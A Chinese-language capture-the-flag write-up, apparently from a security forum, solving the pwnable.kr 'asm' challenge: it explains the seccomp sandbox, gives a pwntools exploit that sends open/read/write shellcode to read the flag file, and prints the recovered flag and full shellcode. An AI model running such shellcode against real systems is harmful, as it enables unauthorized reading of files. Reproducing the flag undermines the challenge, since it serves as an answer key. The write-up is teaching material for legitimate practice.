asm

考察点：seccomp 和借助 pwntolls 调用 syscall

题目

Mommy! I think I know how to make shellcodes
 
ssh asm@pwnable.kr -p2222 (pw: guest)

解题过程

1. ssh 登录获取更多信息

asm@pwnable:~$ ls -l
total 28
-rwxr-xr-x 1 root root 13704 Nov 29  2016 asm
-rw-r--r-- 1 root root  1793 Nov 29  2016 asm.c
-rw-r--r-- 1 root root   211 Nov 19  2016 readme
-rw-r--r-- 1 root root    67 Nov 19  2016 this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong
asm@pwnable:~$ cat readme
once you connect to port 9026, the "asm" binary will be executed under asm_pwn privilege.
make connection to challenge (nc 0 9026) then get the flag. (file name of the flag is same as the one in this directory)
asm@pwnable:~$

2. 查看 asm.c

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <seccomp.h>
#include <sys/prctl.h>
#include <fcntl.h>
#include <unistd.h>
 
#define LENGTH 128
 
void sandbox(){
        scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL); // 初始化 seccomp 筛选器状态,SCMP_ACT_KILL 默认不允许所有的 syscall
        if (ctx == NULL) {
                printf("seccomp error\n");
                exit(0);
        }
 
        // 仅允许 open read write exit exit_group 这五种 syscall
        seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(open), 0);
        seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(read), 0);
        seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 0);
        seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit), 0);
        seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0);
 
        if (seccomp_load(ctx) < 0){ // 应用过滤,如果不调用 seccomp_load 则上面所有的过滤都不会生效
                seccomp_release(ctx);
                printf("seccomp error\n");
                exit(0);
        }
        seccomp_release(ctx); // 释放 seccomp 筛选器状态
}
 
char stub[] = "\x48\x31\xc0\x48\x31\xdb\x48\x31\xc9\x48\x31\xd2\x48\x31\xf6\x48\x31\xff\x48\x31\xed\x4d\x31\xc0\x4d\x31\xc9\x4d\x31\xd2\x4d\x31\xdb\x4d\x31\xe4\x4d\x31\xed\x4d\x31\xf6\x4d\x31\xff";
unsigned char filter[256];
int main(int argc, char* argv[]){
 
        setvbuf(stdout, 0, _IONBF, 0);
        setvbuf(stdin, 0, _IOLBF, 0);
 
        printf("Welcome to shellcoding practice challenge.\n");
        printf("In this challenge, you can run your x64 shellcode under SECCOMP sandbox.\n");
        printf("Try to make shellcode that spits flag using open()/read()/write() systemcalls only.\n");
        printf("If this does not challenge you. you should play 'asg' challenge :)\n");
 
        char* sh = (char*)mmap(0x41414000, 0x1000, 7, MAP_ANONYMOUS | MAP_FIXED | MAP_PRIVATE, 0, 0);
        memset(sh, 0x90, 0x1000); // sh 所指向的内存的前 0x1000 个字节填充 0x90(nop)
        memcpy(sh, stub, strlen(stub));
 
        int offset = sizeof(stub);
        printf("give me your x64 shellcode: ");
        read(0, sh+offset, 1000);
 
        alarm(10);
        chroot("/home/asm_pwn");        // you are in chroot jail. so you can't use symlink in /tmp     将某进程限制在指定文件夹中，保证该进程仅仅操作对该文件夹及其子文件夹的文件
        sandbox();
        ((void (*)(void))sh)();
        return 0;
}

借助 pwntools 查看 stub[] 的内容

>>> from pwn import *
>>> print (disasm("\x48\x31\xc0\x48\x31\xdb\x48\x31\xc9\x48\x31\xd2\x48\x31\xf6\x48\x31\xff\x48\x31\xed\x4d\x31\xc0\x4d\x31\xc9\x4d\x31\xd2\x4d\x31\xdb\x4d\x31\xe4\x4d\x31\xed\x4d\x31\xf6\x4d\x31\xff"))
   0:   48                      dec    eax
   1:   31 c0                   xor    eax, eax
   3:   48                      dec    eax
   4:   31 db                   xor    ebx, ebx
   6:   48                      dec    eax
   7:   31 c9                   xor    ecx, ecx
   9:   48                      dec    eax
   a:   31 d2                   xor    edx, edx
   c:   48                      dec    eax
   d:   31 f6                   xor    esi, esi
   f:   48                      dec    eax
  10:   31 ff                   xor    edi, edi
  12:   48                      dec    eax
  13:   31 ed                   xor    ebp, ebp
  15:   4d                      dec    ebp
  16:   31 c0                   xor    eax, eax
  18:   4d                      dec    ebp
  19:   31 c9                   xor    ecx, ecx
  1b:   4d                      dec    ebp
  1c:   31 d2                   xor    edx, edx
  1e:   4d                      dec    ebp
  1f:   31 db                   xor    ebx, ebx
  21:   4d                      dec    ebp
  22:   31 e4                   xor    esp, esp
  24:   4d                      dec    ebp
  25:   31 ed                   xor    ebp, ebp
  27:   4d                      dec    ebp
  28:   31 f6                   xor    esi, esi
  2a:   4d                      dec    ebp
  2b:   31 ff                   xor    edi, edi
>>>

该段代码的作用是将各寄存器的值置 0

我们的目的是读取 this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong 文件的内容
因为使用了 seccomp 所以我们只能使用 open read write exit exit_group 这五个 syscall
我们可以考虑使用 open 函数打开存储 flag 的文件，用 read 函数读取 flag，用 write 将 flag 写进 stdout

3. 测试程序流程

asm@pwnable:~$ nc 0  9026
Welcome to shellcoding practice challenge.
In this challenge, you can run your x64 shellcode under SECCOMP sandbox.
Try to make shellcode that spits flag using open()/read()/write() systemcalls only.
If this does not challenge you. you should play 'asg' challenge :)
give me your x64 shellcode: adasd
asm@pwnable:~$

nc 连接后接收到 give me your x64 shellcode: 后输入 shellcode 即可

4. 编写 exp

from pwn import *
 
con = ssh(host='pwnable.kr', user='asm', password='guest', port=2222)
p = con.connect_remote('localhost', 9026)
context(arch='amd64', os='linux')
 
shellcode = ""
shellcode += shellcraft.open('this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong')
shellcode += shellcraft.read('rax', 'rsp', 100) # 读 rax 中的 100 个字节到 rsp 中
shellcode += shellcraft.write(1, 'rsp', 100) # 将 rsp 前 100 个字节输出到终端
 
# print shellcode
 
print p.recvuntil("give me your x64 shellcode:")
 
p.send(asm(shellcode))
 
print p.recvline()

结果

whoami@DESKTOP-02CN0MD:~/pwn/asm/attach$ python solution.py 
/home/whoami/.local/lib/python2.7/site-packages/paramiko/transport.py:33: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
  from cryptography.hazmat.backends import default_backend
[+] Connecting to pwnable.kr on port 2222: Done
[*] lotto@pwnable.kr:
    Distro    Ubuntu 16.04
    OS:       linux
    Arch:     amd64
    Version:  4.4.179
    ASLR:     Enabled
[+] Connecting to localhost:9026 via SSH to pwnable.kr: Done
Welcome to shellcoding practice challenge.
In this challenge, you can run your x64 shellcode under SECCOMP sandbox.
Try to make shellcode that spits flag using open()/read()/write() systemcalls only.
If this does not challenge you. you should play 'asg' challenge :)
give me your x64 shellcode:
 Mak1ng_shelLcodE_i5_veRy_eaSy
 
[*] Closed remote connection to localhost:9026 via SSH connection to pwnable.kr

shellcode 具体内容

/* open(file='this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong', oflag=0, mode=0) */
/* push 'this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong\x00' */
mov rax, 0x101010101010101
push rax
mov rax, 0x101010101010101 ^ 0x676e6f306f306f
xor [rsp], rax
mov rax, 0x306f306f306f306f
push rax
mov rax, 0x3030303030303030
push rax
mov rax, 0x303030306f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f3030303030
push rax
mov rax, 0x3030303030303030
push rax
mov rax, 0x3030303030303030
push rax
mov rax, 0x303030306f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6f6f6f6f6f6f6f6f
push rax
mov rax, 0x6c5f797265765f73
push rax
mov rax, 0x695f656d616e5f65
push rax
mov rax, 0x6c69665f6568745f
push rax
mov rax, 0x7972726f732e656c
push rax
mov rax, 0x69665f736968745f
push rax
mov rax, 0x646165725f657361
push rax
mov rax, 0x656c705f656c6966
push rax
mov rax, 0x5f67616c665f726b
push rax
mov rax, 0x2e656c62616e7770
push rax
mov rax, 0x5f73695f73696874
push rax
mov rdi, rsp
xor edx, edx /* 0 */
xor esi, esi /* 0 */
/* call open() */
push SYS_open /* 2 */
pop rax
syscall
/* call read('rax', 'rsp', 0x64) */
mov rdi, rax
xor eax, eax /* SYS_read */
push 0x64
pop rdx
mov rsi, rsp
syscall
/* write(fd=1, buf='rsp', n=0x64) */
push 1
pop rdi
push 0x64
pop rdx
mov rsi, rsp
/* call write() */
push SYS_write /* 1 */
pop rax
syscall

[培训]二进制漏洞攻防（第3期）；满10人开班；模糊测试与工具使用二次开发；网络协议漏洞挖掘；Linux内核漏洞挖掘与利用；AOSP漏洞挖掘与利用；代码审计。

收藏・0

点赞・1

打赏

最新回复 (1)
pwnooooo 雪币： 25 能力值： ( LV1，RANK：0 ) 在线值：发帖 1 回帖 5 粉丝 0 关注私信	pwnooooo 2021-1-25 15:52 2 楼 0 第一次见这个类型的
	游客登录 \| 注册方可回帖　回帖　表情雪币赚取及消费高级回复